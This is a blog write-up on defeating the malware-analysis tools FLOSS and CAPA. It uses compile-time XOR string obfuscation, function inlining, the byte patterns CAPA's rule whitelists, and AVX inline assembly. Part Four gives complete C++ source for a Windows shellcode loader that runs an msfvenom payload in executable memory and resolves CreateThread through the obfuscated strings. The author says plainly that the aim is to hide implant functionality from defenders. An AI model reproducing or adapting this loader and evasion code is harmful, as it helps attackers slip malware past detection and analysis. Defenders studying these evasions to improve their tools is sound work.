Advanced String Obfuscation

Sunday, December 3, 2023

Part One: Introduction

What is String Obfuscation?

String obfuscation is the deliberate process of converting plaintext indicators of compromise, artifacts, or functionality and hiding them behind some type of arithmetic process. Most modern malware employs some type of string obfuscation, and the different types of string obfuscation can be variably effective depending on the source of analysis. This is done usually in tandem with dynamic address resolution of WinAPI function calls to hide the true functionality of the malware. Antivirus (AV), Endpoint Detection and Response (EDR), and analysts’ tools employ different techniques to overcome obfuscation or at least circumvent the benefits it provides to offensive operators. Among the more powerful of these techniques is emulated analysis from tailored malware analysis tools like Mandiant’s FLOSS and CAPA, but it’s not uncommon for the basic strings utility to provide significant value in manual analysis.

How do we implement string obfuscation?

String obfuscation comes in many forms. For offensive tool development, the most common options are XOR, RC4, or potentially some hashing algorithm like dbj2 if you’re able to query values that contain your target value from the system. These operational security (OPSEC) techniques have been used for a long time, so it should be no surprise that tools like FLOSS and CAPA are able to emulate the deobfuscation routines in malware or detect the presence of obfuscation respectively. Either of these outcomes is dis-preferred in offensive development, so in this writeup we’ll talk about some modern techniques we can use to circumvent these tools and maintain the OPSEC of our implementation.

Note: If you’re already familiar with conventional string obfuscation techniques and why they’re implemented, feel free to skip to Part Three.

Part Two: Getting Started

Unobfuscated Operations

Before we dive into the obfuscation itself, lets briefly take a look at the strings that a normal implant might leak. Below, we have a standard VirtualAlloc -> RtlCopyMemory -> CreateThread implant that detonates an MSFVenom calc payload.

If we take a look at our implant’s Import Address Table (IAT), we’ll see that the functions our program is importing leak the entire functionality of our program.

This view is very compiler dependent, so you might find that your executable’s IAT contains something different here but that’s perfectly normal. All we’re trying to look at here is that the functions we’re calling are visible to trivial static analysis.

Additionally, If we run the strings utility, we similarly see that by default we leak a lot of information about our implant.

Without the “-s” option, which strips symbol names from our executable, we leak the actual variable names from our source code and give away that we’re trying to execute a payload.

Obviously, that’s a lot of information we don’t want to give to defenders so we have to elevate the technical threshold of our implant with some type of solution. The most common way is WinAPI pointers.

WinAPI Pointers

WinAPI pointers let us define a typedef, resolve the address to a WinAPI function, and then call that function at runtime vice at compile time. For brevity we’ll implement this obfuscation only on the call for CreateThread but the implementation pattern is identical for all WinAPI.

However, even though the CreateThread is removed from the IAT, the “CreateThread” string is still visible to the strings utility.

Here, we find the first use case for string obfuscation.

Part Three: Diving In

Compile-Time Trickery

In a truly classic implementation, we would use a builder script or manually encrypt key strings to hide from the Strings utility. But because we’re implementing this functionality in C++, we can actually leverage constant expressions to automatically encrypt our strings with an XOR key at compile time (1).

Lines 7-9 setup a compile time macro that generates a pseudo-random 1-byte XOR key based on the time.

Lines 17-24 setup a lambda function as a C macro that we’ll use to wrap around key strings in our executable to call the obfuscator constexpr on lines 37-45 at compile time.

Finally, lines 51-57 are the deobfuscation function that’s going to get called at runtime to return our unobfuscated strings at runtime to the desired function.

To use the macro we discussed above, we can wrap any interesting strings with “STR()” and we should see them disappear from the strings dump. But lets quickly make sure that our implementation works. I took the liberty of implementing my own version of MemCopy, just to get rid of the linking to the C Runtime Library (ucrt.dll).

We can see that the “CreateThread” string literal does exist in the source, but the compiler uses the macro we established above to hide from the Strings utility just like we expect. Most obfuscation discussions end here, but we’re just getting started. However, more advanced tools will still find our “CreateThread” string.

FLOSS

Mentioned earlier in this writeup and elsewhere on my blog, FLOSS has a powerful string deobfuscation emulation engine that mimics the deobfuscation routines. In previous writeups I’ve demonstrated that using a two-step deobfuscation approach will bypass FLOSS’ ability to automate the deobfuscation process. However, there’s a couple more interesting ways to bypass FLOSS’ analysis and we’ll be covering these bypasses and how they work in detail.

Per the FLOSS documentation, FLOSS can extract the string types enumerated below.

The first three bullet points are fairly boring, but bullet point 4. contains a key word: “function”.

If you recall, our implementation worked based on a lamda function that actually consisted of several nested operations. Lets take a look at what happens with a couple of subtle changes to the instructions we give our compiler.

When we tell the compiler to inline these functions, instead of using the “call” instruction that will move RIP to another area in our program’s .text section, the compiler will put the function inside of the calling function. Let’s take a look at what that looks like in a disassembler.

On the left we’re able to see that in mk2 of our implant, our entry function (_start) does in fact call a function that then uses the xor opcode at address 140001356 (center) to perform the XOR decryption. However, on the right, in mk3 of our implant, we see that the xor decryption is happening inlined with the _start() function itself because we applied the always_inlined attribute to our deobfuscation function. And if we run FLOSS on the mk3 version of our implant, it’s unable to decode our strings.

The above method works because we attacked one of the fundamental assumptions that FLOSS makes when determining when to apply its deobfuscation analysis.

CAPA

Even though mk3 was capable of bypassing FLOSS’ detection. Lets take a look at another tool that an analyst might use to understand how our implant works.

Obviously, being able to detect the type of obfuscation we’re using is not as serious of a problem as being able to extract the deobfucsated strings, but it’s worth discussing a couple of ways to overcome this. CAPA makes its signatures public, so lets take a look at the XOR signatuture.

Reading this rule, it’s going to match on a tight loop that returns a non-zero xor. However, the rule also includes a list of whitelist variables we can potentially use to overcome this detection.

Above we can see that on line 56 we apply a relative jump over the whitelist bytes on line 57. Therefore ensuring that the bytes get included in the tight loop, and don’t affect the arithmetic of the XOR operations.

Both of the above methods revolved around attacking the mechanics of these specific tools. Next, lets take a look at a way we can overcome FLOSS by using a modern(ish) CPU feature.

Advanced Vector Extensions (AVX)

AVX were first introduced into processors in 2011, and their intended use is to use larger registers and new instructions to support large number arithmetic operations.

Because this is a newer processor feature that uses non-standard registers, it’s reasonable to investigate whether or not FLOSS can handle emulating AVX operations. There’s a couple of different version of AVX, but most modern processors include support for the XMM registers and the operations we need to break FLOSS’ emulation.

The snippet above has detailed comments, but let’s briefly discuss what’s happening. The inline assembly snippet is taking in a UINT pointer to our destination. This is important because we’re using the vmovd instruction on line 62 to get the output from xmm0 to our destination buffer. We similarly cast the source buffer as a UINT pointer so that we can pass it into xmm1, and we’re going to pass in the key as with the “r” operand, so the compiler knows to put it into a general purpose register before interacting with the inline assembly snippet.

If we run FLOSS with the debug flag, we can actually see exactly where it’s falling short. In looking at the debug output on the next page a couple of things become obvious. Firstly, our suspicions were correct, FLOSS cannot emulate some AVX functionality. And secondly, this is actually seems more to do with the vivisect python library that FLOSS depends on, and not due to FLOSS itself.

In the above screenshot we can see that FLOSS is unable to emulate the vmovd instruction from xmm0 to the pointer destination stored in RCX. Because of this limitation in the vivisect emulation that FLOSS relied on, it cannot determine what value gets stored in the output buffer (data[]).

CAPA is similarly limited, and is unable to match the AVX opcodes to the XOR encoding rule that we discussed earlier in this writeup.

Part Four: The Code

exotic_xor_mk4.c

// x86_64-w64-mingw32-g++ exotic_xor_mk4.cpp -O0 -s -o exotic_xor_mk4.exe -masm=intel -nostdlib -lkernel32
// mk1,2, and 3 available on https://patreon.com/0xtriboulet

#include <stdio.h>
#include <windows.h>

#define KEY ((((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 \
                   + (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 \
                   + (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000) & 0xFF))

// 
/*
 * This macro is a lambda function to pack all required steps into one single command
 * when defining strings.
 */
#define STR(str) \
    []() -> char* __attribute__((always_inline)) { \
        constexpr auto size = sizeof(str)/sizeof(str[0]); \
        obfuscator<size> obfuscated_str(str); \
        static char original_string[size] = {0}; \
        obfuscated_str.deobfuscate((unsigned char *)original_string); \
        return original_string; \
    }()
	
// MemCopy prototype	
VOID * MemCopy (VOID *dest, CONST VOID *src, SIZE_T len);

template <UINT N>
struct obfuscator {
    /*
     * m_data stores the obfuscated string.
     */
    UCHAR m_data[N] = {0};
  
    /*
     * Using constexpr ensures that the strings will be obfuscated in this
     * constructor function at compile time.
     */
    constexpr obfuscator(CONST CHAR* data) {
        /*
         * Implement encryption algorithm here.
         * Here we have simple XOR algorithm.
         */
        for (UINT i = 0; i < N; i++) {
            m_data[i] = data[i] ^ KEY;
        }
    }
	
    /*
     * deobfuscate decrypts the strings. Implement decryption algorithm here.
     * Here we have a simple XOR algorithm.
     */
    VOID deobfuscate(UCHAR * des) CONST{
        UINT i = 0;
        do {
            // des[i] = m_data[i] ^ KEY;
	__asm__(
		"vmovd xmm1, %[source];"                             // Move source to xmm1
		"vmovd xmm2, %[key];"                                // Move key to xmm2
		"vpxor xmm0, xmm1, xmm2;"                            // XOR xmm1 and xmm2, result in xmm0
		"vmovd %[destination], xmm0;"                        // Move result from xmm0 to destination
		: [destination] "=m" (*(UINT*)&des[i])               // Ensure correct size
		: [source] "m" (*(UINT*)&m_data[i]), [key] "r" (KEY) // Pass in source and KEY
		: "xmm0", "xmm1", "xmm2"                             // Clobbered registers
	);
			
            i++;
        } while (des[i-1]);
    }
	
	
};


typedef HANDLE (WINAPI * CreateThread_t)(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  SIZE_T                  dwStackSize,
  LPTHREAD_START_ROUTINE  lpStartAddress,
  __drv_aliasesMem LPVOID lpParameter,
  DWORD                   dwCreationFlags,
  LPDWORD                 lpThreadId
);

// msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f rust
UCHAR ucPayload[] = {...snip...};

SIZE_T szPayload = sizeof(ucPayload);

INT __main(){
	
    LPVOID  lpExecMem = NULL;

	
    // allocate memory
    lpExecMem = VirtualAlloc(NULL,szPayload,MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    
    // copy memory
    MemCopy(lpExecMem, ucPayload, szPayload);
    
	// resolve CreateThread
	CreateThread_t pCreateThread = (CreateThread_t) GetProcAddress(GetModuleHandle(STR("kernel32")),STR("CreateThread"));
	
    // create thread
    HANDLE hThread = NULL;
    hThread = pCreateThread(NULL,0x0,(LPTHREAD_START_ROUTINE)lpExecMem, NULL, 0x0, NULL);

    // wait
    WaitForSingleObject(hThread, INFINITE);
    
    return 0;
}


// Just to get rid of CRT
VOID * MemCopy (VOID *dest, CONST VOID *src, SIZE_T len){
  UCHAR * d = (UCHAR *) dest;
  CONST UCHAR* s = (UCHAR *) src;
  while (len--){
    *d++ = *s++;
  }
  return dest;
}
}

Part Five: Results

Implementing AVX XOR obfuscation allowed us to bypass both FLOSS and CAPA.

Part Six: Conclusion

In Part Three, we saw our evasions' impacts on some of the most robust open source reverse engineering tools available. Of these evasions, the implementation of the XOR decryption using AVX inline assembly proved to be the most robust in evading both CAPA and FLOSS without the need to include whitelist bytes, function inlining, or a two-stage de-obfuscation. The implementation in this writeup is not the most efficient, but it’s nonetheless effective in achieving modern string obfuscation.

It's unlikely that the limitations covered in this writeup are exhaustive. The vivisect tool used by both CAPA and FLOSS has limited documentation, but it’s likely that other emulation limitations exists that can be leveraged to achieve similar or superior obfuscation results.

This writeup arbitrarily chose to focus on the XOR algorithm of obfuscation for simplicity and clarity. More complex algorithms may be obfuscated beyond the detection threshold of the tools discussed in this writeup with varying degrees of complexity. However, this writeup serves as a good starting point in the development of advanced string obfuscation mechanics.

Special thanks to my supporters on Patreon that made all the research leading up to this writeup possible.